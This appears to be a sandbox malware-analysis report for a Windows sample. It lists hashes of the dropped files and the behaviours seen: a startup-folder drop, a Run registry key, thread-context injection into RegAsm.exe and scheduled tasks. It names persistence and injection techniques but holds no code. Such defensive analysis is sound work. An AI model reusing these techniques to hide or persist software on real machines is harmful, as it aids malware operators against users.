SHA256 2edc14067107a0226eb139e2f8da99edd865abaf170a3cc4163fe843746898f0
SHA512 ecd7a26c72425b14ae1cbececcb53e4336f6f06380dc6fc4a1607954922eb0698304fdf545975c04baf804c85041ec7aee03cd17e24ad2b0b2a71f716a653399

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\tr.pak

MD5 72942f338e8dad64aec34f4034e3d539
SHA1 38d0d507fd3d978797a0436bfff9f4f6aa659205
SHA256 cfe9dbe0f10abbefc2bdca96e3eeb5508fab69c63022d7a71bd0c7cf595d6f3b
SHA512 e4ef6c0685c5750c3f3c4c075f6d0983bdbf7bae9ec821159752493247bd1ff826649c45f7a5ac7959fe3e668d4ed4fed8b6c1f6c15b475b2e765872da118e49

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\zh-TW.pak

MD5 f8a87d510cf4cba5b87bd8731e3a593c
SHA1 ce8eb9ccdfd2690e7af24a65d43b5f118bc2f4e8
SHA256 435f441557a2b6c8fb67e14fba224140db2dd862b2710fe1e709c5c30028c72c
SHA512 2c90fe020aa07900b84160a669287e8b77d66071641df18e9253dd9e13d20ee20605c6b962dd4ec10d7c5da6914db7830a2619147792efd5e0d3795bcbeee078

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\zh-CN.pak

MD5 3aaa866745085ed14d96fbd793248c81
SHA1 874c1e7b3900934bcc3e50913b69cd1cd35b9b62
SHA256 b6c982ba2aa4e6317954b8d2c751ac8722ddc0b708b61ac71731d63363fcbbd8
SHA512 1034bdd3ec9931a4acac394c8c018749fe461b6ec734ba121a0bd74766de32bdcd41b85b8c091ec6805c56f27ddcf71a90d865d084be1807614e56659f074839

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\th.pak

MD5 83c18be3c6f9def5b4086970d5cfbe79
SHA1 a27fccf89557157ec635c7cc3ef8b9ef0e360d8e
SHA256 808d17538e212fc4c63c9f1687f0f66634e5112c781c2a78c37724865c4caa52
SHA512 ca52c9090310ab42f989b780dbd8e703cbd2f292c9b96020abff851d0d948dfec4ec619f0456ae1a0b3dd58c8b7d9cf3594240639bb96ebe0bd32b514edf1106

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\ta.pak

MD5 d32d5a295786fd7007d089fbc4161207
SHA1 909db33241e63c4a59cadbf894051ecaed4aa95c
SHA256 7fed1e0429e98dbe03c9416149329a89ebf153fa532b6b7aa86d75f7d01fe06c
SHA512 46ab9a3c6d1e78740d7e37ccd5aaf6c5e57a57d32d120b3339aa9cf8afc24cfe89d6b436f6964d7777e51131854198cd7b796229a9b9e82185758b45e6126055

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\sw.pak

MD5 9f7353a51a43e712a99106ff6493b19d
SHA1 f10e1e8c81186d60c78c981305e4648bfdf2f106
SHA256 733af334ba2167c422a710a0f3721511c31326946fc81153eb9debdff32e726a
SHA512 401014c7a1c6b0e151c66a1316abe389bb5f86a8d108490765bd4c54b4374329b2053e8b6908c4763fddeaf5912f0bd28bdeada4e00ffd067f538eeb8eef46e2

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\sv.pak

MD5 f84739b0bb94c33e8dc4c19848fa0585
SHA1 ef855fed5375f7860ee422abe85f83ee074a6f6f
SHA256 63d0ff685fc4a062edd191d67bb96c8d13a0424720ed2917c8d636ab9bd603ff
SHA512 b0271b84bc916a8b676d11059fb3224467d1f6c4baa75143fa3ab64179f06d2d6fb4f92b767632fa2159cb7399c6e734485600860620292766db235e195f7eb3

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\sr.pak

MD5 6aedf69ce3e67bb23699d802b591de6f
SHA1 617bcb7a106f3014bafe37bbbfcf0a33241d1309
SHA256 02c62a98456e7940c08fd5c23401cea1dfe24210f8386c88bb5f98fec28a73af
SHA512 f7228ebfae7eeefbee866b979eea4af65e5b2fa28b5b441720134caa252ac4d75271e172eab4b351e90cd42e24860e9c37fb3131b5a5709b0d7f53fff884d6df

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\sl.pak

MD5 040799b02c63a9bff8d9210392d88a7a
SHA1 c19ea6102ff3227b76d97cdcf83f3a7b7ebf2d08
SHA256 6d480a823881f2aebbf29ce00d3463f69d1dd40d3152f231c86f7cdcf619d8f5
SHA512 d6758eb7f6ba17959cc6c5ef43275c04230254547e0c1bd7401adb17e7a65b9fc05399c08301f7fae8630cef3d8c8b40b375847c328a2a5b1338f3f62dd44131

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\sk.pak

MD5 a9f18bae018b737f5c4ade3c45c5f8a9
SHA1 d8601166ac1f8f24bb8b8d7623477ccba6d26560
SHA256 646449ade9e3d4389499bd3d26db0ff42e68bc0afcc30e927605ee16d9607d72
SHA512 81a73e3e60709d6e2937bd9a3051050da126660f4c41b735c4f15b82708d9754031435a0c95a96536427e7e0ba27ba48f7e7314fe3faa1550bffa9531ae6c64b

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\ro.pak

MD5 a9e6c44ef51e43277526f6a44035ad0d
SHA1 6b84ff4d7524783f960e95e27f5a31cbcafcb500
SHA256 636731e7126ad60b5e1e7f1ac726e29503ef32fa533bc4e7b5ebfe0b6cc2a06a
SHA512 9487c3255e5d02be6f31f0f0ffb986f41385a65e993b8100a5f6d7eb4ec8828d7499c04c658fe29198bddf5896690a143980594fecb683b9f43dc2b69e2030d2

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\pt-PT.pak

MD5 b1cc62e6dd4849f449cb5f6a23c6ac22
SHA1 59a86b266fe98fe62fe4749ceaa83275ec112673
SHA256 ef21042a0c796e4b4c9b5b50784eca5da35a0195b6d6d5d424595b1873bf78c2
SHA512 4753c6c3e4c0e4abc22f092f64d5ca2bcc15a20c08826e6f196aa2243836a380f51627057fd868095c2aa49521548419baf6a170fbb378c0f44b86a22b728dd9

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\pt-BR.pak

MD5 e1e572b8f5c3112e0cb45631ebfda44b
SHA1 3cf3909c04aa95d1c2c0c5944e5611680ab2251f
SHA256 69cad247e15cc4429880ef478bf0a97efbb9e23423796a191ea15c89f12c57b8
SHA512 5d2ab867979d850f28767e030c89cb02ddec4a400f60013807de07068522611e30c869f0f2299c1b058957185d4ce878ce1bdaf92ba36e4df4fcfd86e024f9fc

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\pl.pak

MD5 da6f7c5b1f1c224489f218bd73dbe21a
SHA1 0abb98149d6964c7ce086b434a8b449e72ee741f
SHA256 4584ecb1d5343ef579b7e46fc9df393f86e516c805766f3ad28f9165968fe0d4
SHA512 3088b265a5a3c3549279acca2206887c696ebf5e7337c2e4e4501fb2dedcd6531b1e34287aaaa71011edd6c22b71aebb586826899f641a2799977fc8fab2a746

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\nl.pak

MD5 181d2a0ece4b67281d9d2323e9b9824d
SHA1 e8bdc53757e96c12f3cd256c7812532dd524a0ea
SHA256 6629e68c457806621ed23aa53b3675336c3e643f911f8485118a412ef9ed14ce
SHA512 10d8cc9411ca475c9b659a2cc88d365e811217d957c82d9c144d94843bc7c7a254ee2451a6f485e92385a660fa01577cffa0d64b6e9e658a87bef8fccbbeaf7e

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\nb.pak

MD5 af0fd9179417ba1d7fcca3cc5bee1532
SHA1 f746077bbf6a73c6de272d5855d4f1ca5c3af086
SHA256 e900f6d0dd9d5a05b5297618f1fe1600c189313da931a9cb390ee42383eb070f
SHA512 c94791d6b84200b302073b09357abd2a1d7576b068bae01dccda7bc154a6487145c83c9133848ccf4cb9e6dc6c5a9d4be9d818e5a0c8f440a4e04ae8eabd4a29

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\ms.pak

MD5 9b3e2f3c49897228d51a324ab625eb45
SHA1 8f3daec46e9a99c3b33e3d0e56c03402ccc52b9d
SHA256 61a3daae72558662851b49175c402e9fe6fd1b279e7b9028e49506d9444855c5
SHA512 409681829a861cd4e53069d54c80315e0c8b97e5db4cd74985d06238be434a0f0c387392e3f80916164898af247d17e8747c6538f08c0ef1c5e92a7d1b14f539

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\resources\app.asar

MD5 3c67aa21b4b3efcea7e29b3429293d46
SHA1 5b9cc3382ee7af3e4eb7c2bdcd3c0096793bb6ea
SHA256 f55f0c5aaef502e3830a6ee32164ff3a5a8456a5023936fec3d63eb9e6d5a290
SHA512 3dc01387f00e532c32bf1ae4416c3622dbae629a403eed3376e01570b1d2ceca119134a7088bc591c3bb425b596a38ed9768c310287ab9dfe587f7976bb27c75

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\mr.pak

MD5 3d9ed84028b1ce31b0a44646059fd6cb
SHA1 70dd06ffa8445f80c168118b0625851bb8c1d387
SHA256 d9e9bd15dc4c4a576f43a788bbc5bc21610d9d0cf1f29c1a248d71384d835717
SHA512 d9af8e4c4114b96a5235743a40500969d761e7bcd7e3123ae6d0aa9769363107ef1ba795751aa9599f0b94bd5d4b59fbcc761a606579eb4a58729167106527d3

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\lt.pak

MD5 980c27fd74cc3560b296fe8e7c77d51f
SHA1 f581efa1b15261f654588e53e709a2692d8bb8a3
SHA256 41e0f3619cda3b00abbbf07b9cd64ec7e4785ed4c8a784c928e582c3b6b8b7db
SHA512 51196f6f633667e849ef20532d57ec81c5f63bab46555cea8fab2963a078acdfa84843eded85c3b30f49ef3ceb8be9e4ef8237e214ef9ecff6373a84d395b407

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\ml.pak

MD5 aa2c1e7576db68006aee54af80444620
SHA1 31b338d7a4e77d4b976e9627ef4d4c77087a6045
SHA256 07522444431e097470ddd05deb536a281e5cb721de71ca5354d33567b2db2981
SHA512 0dc25771df1c4c5babd139a354c852d9dc0ad55ce19a42399c9c668a115b1bab49c654e838429306cde79b901d5411a71b0e206ed3cb76f34c2b44d8e4086ee0

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\ja.pak

MD5 28f2e0bf2ada1005b4c2113868a3bc7c
SHA1 fb7ecb70f9ad17414ca62a819028f2cdce6fd917
SHA256 6bf456ab9008a2e5414bb11672e7676efe01045a59467d0baaa3de477a362c56
SHA512 6b4f666b15fc614fd7a558c489b5515b83d42fcc3f0519b51155a2be708236ebe0273d742edc8ffe906fd7e4d3aafcd619526c4591a67c51c2677516d66c3398

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\it.pak

MD5 0d8c022f3110d14705f9ee49549fe087
SHA1 f30990e563d2d24516d277017b98728a0e5d7326
SHA256 44136aaeb6bd7f52ee0dfdac594cdf7805a6695daab4a1fd14f42fab47b6818a
SHA512 35def8beee4ee456a0dab678c179605735ef8db6caf7c641ea6145cac232d5d76e855e510395ea1107be017344bd22d53cf513b30405a13b5a5c5930bf8c9d30

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\hu.pak

MD5 f5e1ca8a14c75c6f62d4bff34e27ddb5
SHA1 7aba6bff18bdc4c477da603184d74f054805c78f
SHA256 c0043d9fa0b841da00ec1672d60015804d882d4765a62b6483f2294c3c5b83e0
SHA512 1050f96f4f79f681b3eaf4012ec0e287c5067b75ba7a2cbe89d9b380c07698099b156a0eb2cbc5b8aa336d2daa98e457b089935b534c4d6636987e7e7e32b169

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\hr.pak

MD5 275c35c0dafe1434518e51b02043fb67
SHA1 74cbe6d566050f39910e2e0d72553de9a26cb2d8
SHA256 2f6a640a8342923699dab741a3ab8899d0df666b8e251af6290b020c79e740b3
SHA512 12db3bd13b3175d984ac009de00dab9cb14900707160b113ae4c49a1f5c5d92f216d07148f869df594cb0002ad524d4a40e69bd627a2521396d8201f9758d96f

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\hi.pak

MD5 1963d3b2c5bd62201b22d4abfb5dc6a0
SHA1 84b6e48dd472ac50c857162c6788dac2cca0c686
SHA256 0d02d813af676ad0bd595bd4cf54917316ea00e6acc61c6cf5ba01a91118aad0
SHA512 4d23886a89e7cb198d6b7f891c1a55bb3c3a845e8380b20d4a3561c5fda1a8cfd41621936ba42703221de712161998f0fa93d304e625967e82995bd80d7ff4dc

C:\Users\Admin\AppData\Local\Temp\nsrE1E0.tmp\7z-out\locales\gu.pak

MD5 6d58ab759eda835e2f778b096b60fc72
SHA1 6238a7f9360ca344bc2f5ff21a107567b7b4c42f
SHA256 66c1383fb97cd1593a1198d5d39bda6f862889d0dd8136e475fa9311b9d77c43
SHA512 46491c587878705db8bae5f2f3ea57827b992f273e8994396744fc81d88e2d5092efb2e8aee863b9bd3034a32cd93318e696f81306a6c696741817c38c46e24b

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\ffmpeg.dll

MD5 8e12203d82e4b5a14c3339fd58863b0d
SHA1 d9393a40fc2383b1f140f3ce720d463d94c45a1f
SHA256 05f5a51563edcab545672465d71ee3018b34e4505e0dd367da8132639affc78f
SHA512 82de82a8012d25304cdca96967b1965909ccb8dbdd22c27970f9f690c8e1b54cd6011d37d6c872958efb72ff1b4de59c5b79b98af3a128d2493bf3caba3bf732

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\ffmpeg.dll

MD5 f982c86bd4de04c53d3e12ae856f7afa
SHA1 5c72678f6a7db3906853219faf468a951c067a37
SHA256 2479441e3376e237da87330b7bba557cada8a48c67a6cd9f137ad857d874edf0
SHA512 e9b9892d1c5328c88be0f9000c8e626db22450d7c14571742e1e355e9286443a47925ad6b4909ef53f5d964e36572a2d4b6e5b467c2f1d14d4e49812cdba049f

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

MD5 626be8af013092c7a71a3426a5b4d92c
SHA1 78680db91770ee60745a6cd2aab15f3543943e97
SHA256 b50a9832c5c80cfef862e13cce83da5f3cf86e84d9c5af3e4c344220b45df203
SHA512 5111d870194e5e42ca2bb06bf72c9db7f36bc79664cefd5c95494290389eb15e0a4ca2835f978e2a9dd681b66052121d99a50c4210fc0fcf7fe8289078b40103

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\v8_context_snapshot.bin

MD5 6117119e80b4f252aa1f17e09ae68d2d
SHA1 847d5e134ea95640a9e873a85a94556c15d99058
SHA256 1a2b617ca5a79fa43028af3b5d390bb5ce11542a87283a3f5f137100b23f4fea
SHA512 233e93ddc1bb2e936c9aeb8d57ff25484efd1e16d581a6471baee8b6df623d4c855b147fdb477096ba8c1285b0ec5c9c6c5945a9c8793d9a2f99884871566b76

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\icudtl.dat

MD5 abbf5c0f5fd4c973fe3c0ee4ac4d77e9
SHA1 2aeae6bc2af4fdf196708107fa4fb8c94f36d2a3
SHA256 606051596b2d3a9bdecd02567abcaae82b2e190384bd5d6b64c7f96511a13612
SHA512 719f03d9eaea35a13f9da3665b3e0fe1c2d2baa1d1d14c26542947bacdeed4cd4d9c97e3e95c9d82363e352822ae16b1b39301a7efc53bfefec0fc182ef4b6e7

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\resources\app.asar

MD5 21d01c989f45da6aec91d13c622f913c
SHA1 48ee4c1638a15e19ec69ef87b222886410200e94
SHA256 5f0c98047ad545deabfe7b111df4cada6e8ef54c6021b10dbc09ddc6df9ef057
SHA512 3cf45bcca30963e484ffe269f4ba8dd8de8dc9311cb504cfa7453dde971520b79c25592afb477c911d525200216c34ffb8bc6e680efbc39cb9b9916c2c3f6fd8

C:\Users\Admin\AppData\Local\Temp\a379126e-e9a6-45fa-8342-06542d02d5ee.tmp.node

MD5 d67a70ee8fd75f79cef8a59e1960a6ce
SHA1 9de35f5c820867045e812b57502a8f97591291ef
SHA256 dae9deea9b06ea5102cca434bee8d62ad212a67ed58f1b26612cbf95cc3da67e
SHA512 29fa8dfad25d96b69c14a825ace6df99472a79e4c4564454f16f3e6de5f92d33e3f0b0c1ccee4a30503f67016649daadfb6635cde8c8d6280cccec9f37033e12

C:\Users\Admin\AppData\Local\Temp\6417195a-2d9a-4425-a953-b90217f9402b.tmp.node

MD5 c8da1d76b16f2791bcc9421bb2cba79f
SHA1 40e4c6d4eb550b752c25db34d7c09b125bff9f82
SHA256 675541562f2a7fdc917645091ccf801b7c9a4d8466711f5999d5397f5d328aa8
SHA512 4570c95ab5c8446d2ddb27147e848a700517510fbb437c52dd2daafd653163d06476bdf3c9327a0b7750072299080185a2d6bff5b35b071782ddf8977d75d29a

C:\Users\Admin\AppData\Local\Temp\262c572a-37a2-4775-8a8d-993a45cd015f.tmp.node

MD5 09505b058694bd031b26ad9f69a46291
SHA1 1dbc9a18ead85ad42f7fc5837a28f71b8f88987e
SHA256 b4c310f2397dc562c2af9e573a9ef3b3363568725656bea1f8356fe0a9bf722d
SHA512 0ac31a6bc5fdd0a7d38c9f44430cf95de7a63259e412b3afa56668e0b81ad0d16fdaf1d6d56f16889ac6fd8446ba10ac2acccc766cc47e8581e16fe8842e6af8

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\resources.pak

MD5 6881ec51fd1b41f1f9c34503abb82838
SHA1 cd1889714b5219a22563ec9bc83a3af0e496ae82
SHA256 c28d81e26881187b11d5d707239a4fba8e4b372480a90f16ff318d383b1543f2
SHA512 d1deb9ac94527c5b8d5ce7c0e64a4113336d206b1866d2d9269bd23e114eaf98ec9319a148d6e86bf45f2cc601ca4cb96a90798e2a48ec472db1e77874d8fb7e

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\locales\en-US.pak

MD5 0cca6cd89ce7006983ba8f18c1c6c9c3
SHA1 53058d3b7b3a640c141749d4b163333d54196ad5
SHA256 00cb01b7839b91ba426773ff758a9c34abf17af912f857a5ded7883c468c3de3
SHA512 f77ed71c6cb8fd30c4a610b63f820221e4d4368fb2e62e6a773425f1515a9c8a9461e31a76a8977a07e28baf1a563d87bc8040efa368af028375f9d5637b9291

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\chrome_200_percent.pak

MD5 a8f511441a192d3dc428eae2fe084514
SHA1 7848853dbab375809ed8b66dadf12a644860c872
SHA256 3bb8dd299546b08864159616a1e9f9dd5345ef7282ddce2e708b478646b9c6b5
SHA512 2a76dfa98bd047d3fc9493d5470ff95936585eee332500e674dfe7b5fe212a7925120fdeedd4a71054020bf75c74efb7550f9e0cc1208680d5cc2f8dced92251

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\ffmpeg.dll

MD5 304d33ecdf031fb55f671bb556b37e05
SHA1 6080d43fb3ed0c289ef2e1afe198ddcc5681cb23
SHA256 8d6392b36b617fbf2f6b6d0233d4c26c08b9b221ddf1fd3cbe94f41c7c1f5070
SHA512 52cf268df7d8fbf60940e7f16664b47cff2ff1f7585749750287b223f6ecdac46bc1df7a82abc34bc7e80e6dce08b9e1cbea2e921ab9ee96239ddadcdfa3f29c

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

MD5 aba9208f124127b32e8d461b64f11fc8
SHA1 7cf68f57a72b5832ffb35377fadbf09694cce7d5
SHA256 192deb193208d2dfd3bcd714f90431cb13f2d74c7e89d63fbb9d79254f793e0b
SHA512 569af631c8f2be95b1f5e548250c8043dc5551d5845eba5df4610f7d71d2cf33b4573f9c5b9b0052ae3045411df0ec9487b93c8bab41c42fa827e8b2ecb56814

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

MD5 3bb5f51990859b37ef8dc15e0661569f
SHA1 02ce54697c702e0875f786f09727921689097322
SHA256 7ba1b56ae2980bff970f678811bd214cf38ae0c4a272955fa2c41e91bda6c24b
SHA512 e1caf14d74c055a3fbed2f48b2e2691e1538456b35f408ad829cc0e28d2a0b019e1b73b39da0bee5a9c8e5f21ab0760d72d3e4dcb90da0b18431877fe816c81f

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\D3DCompiler_47.dll

MD5 4459760c4f66080c3d267e99924aacf0
SHA1 2cb17d72f3c1d305e30ffdc0161fcbb8d3dfa05b
SHA256 cdedd5c86753f454f425684aefb0fdae99abdf7a744c84d50d879969b45b300c
SHA512 d6550e3624b5a3731aea277da8ec37c52d3e4f2a065cd236e631499f6cf0dec144623b1a93914a029fff21ae6549d02b055fbea299f6148d780cd9cd8695c4e3

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\libglesv2.dll

MD5 d0e8ef9997ac3b4d6c49452ee6914a85
SHA1 acdf2fbd553a8a2eeecfa537330061681f1f96db
SHA256 572f88916d8a4067005ce2c0ed9c5925dc0bf93fe4a2536d68268f52b6cf4afd
SHA512 0131603e442d360d31d15d76690ef6295c5bdb6cebae9a8ae43fe2fad4ac84a6cab0393dad40acead37fc15e3490d26763c98523ec0adb84712f940d1e3b891e

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\d3dcompiler_47.dll

MD5 27d9886979f4aeae9790effd4ca8fe09
SHA1 5ec26661524dbd80a1162f1a7e735d1db4baec6e
SHA256 442eadd7f05d23881376a0cafd9de08f18ab4bb4c7e93fab0429f381077738dd
SHA512 d33bccd3ebd0ce4d87b596685c354306569936ea56b992fe60ede35efc6181bff85ebf959ebfd6a340ec57265f558ac964a1fbb5d547648d2bc99f3a6356c9d4

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\libGLESv2.dll

MD5 0eb44e57c4ecd0127b1ab92745e6960a
SHA1 af38e8de9de054ced435f8ca1477bd0ce6d75ee5
SHA256 f2e539cc7f8ca0ec45f7ce1ec5021285f172e7816aed2ac178c9a956dfb5b2bf
SHA512 bea4980cc8fc064bbb38c35d9143ab73c6342ec1e0422913eddc10c9a8ddd45ceef7ac1b7e94fd2fc5778ebf1ac44b1b1913dba7761bc0ec707ccfbd346c8002

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\libEGL.dll

MD5 79337d77bfce31f8d459e5ac8397c48f
SHA1 a9378f9903b052fec65d5c61097554c5da77a182
SHA256 3a06c764acd05f0437a2be75c3aaea177878de39c8fdc0a699adfd7af889c6d9
SHA512 4af8d59ff27a04c4aa93551e6f32de296c986ea765e99177b6d2b5a3259812e8b2648e477f670163cda5027161622370dbf415a40f19abbfe7e886d16724d47f

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\libegl.dll

MD5 c9b739353bc51115e476b82da5daacfc
SHA1 0c486dad37b40eaa3b510fdacfa634c61e5269be
SHA256 812eac13cc92e1e522dc4e152d72320ad8d34f70aa1d1fa1598775731c9ea9fc
SHA512 74551b6617e6cca5025bdace5281207dae0bc0a067b12fd0e1f5fa3b85fbffc44e3f948d129f1bf41951302c1ff6cbfb573d5cdccc536dc1d01d5a8c98a6990e

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

MD5 69516b3054fadf4020c0034097f39808
SHA1 b1688852417318baba2a2398182e3d3369c5096f
SHA256 c43d3847ef321a9ef4b578a913596598caf60bc884ac7c0ec2b300070b98b87e
SHA512 3f93f170db028ea49d87f7352b2b81edf1f5afd8d462740af031fdcf4a87cb2fa30f24f369cd04e6eb6cce49830e7bd6f7e00caaa12a8c49fb49016e3701253a

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\vk_swiftshader.dll

MD5 ea513d46c5380734e2ae203e13581bf1
SHA1 7bbe304d8745c737794f246476f5b691f52670c9
SHA256 0acd361e968d37871fde9810a62f917498ca3eb98ab3bdb79e46864a5990e470
SHA512 3910cdda3b5b3563b9c120469586e96c9c0d33f1c41abf46ff67e4f654fdf473871e9f3478846e39b3bd36a4f4f178ff00412569081980d6090bb804425c015c

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\vk_swiftshader.dll

MD5 751eba0391127c3955072b52cba58709
SHA1 c0fc657b85c7ef9061c286222aee22d9fe71ab43
SHA256 e4759192d63e207f9b9240304b108571eec089fe4680bbad67f02a3fbb9d38c0
SHA512 4b43eb2e448542c707a4cfc4dc5b6355db3730577d5c8d15ccc8cff3f7bb31773c030431f3fa1e0f36bed97695439f056b7348852c7a94c6ef7982987e0f55c6

C:\Users\Admin\AppData\Local\Temp\Admin_MAP.zip

MD5 de4359397f532484bdb8a84fd94f7a5a
SHA1 84f285282f3e048b9e0cb600586f9f1bfdad43b3
SHA256 54e3b0937790d6bcffb9f6ca59f2f15edd485a5835b2b1a41b4ae8fb69ebea66
SHA512 d5469398ad8a594e923bc265e3e5cd20a16bd08970efcbca5a82983f084b159b891e92fc3bb5f95b0f2e4652ac5bdb022009fa2228b9736d002d22c25cd90506

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-24 04:05

Reported

2023-12-24 04:07

Platform

win7-20231129-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe"

Signatures

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\dfs1 = "C:\\Users\\Admin\\AppData\\Roaming\\f32\\331.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1284 set thread context of 2388 N/A C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.sln C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.sln\ = "sln_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell C:\Windows\system32\rundll32.exe N/A
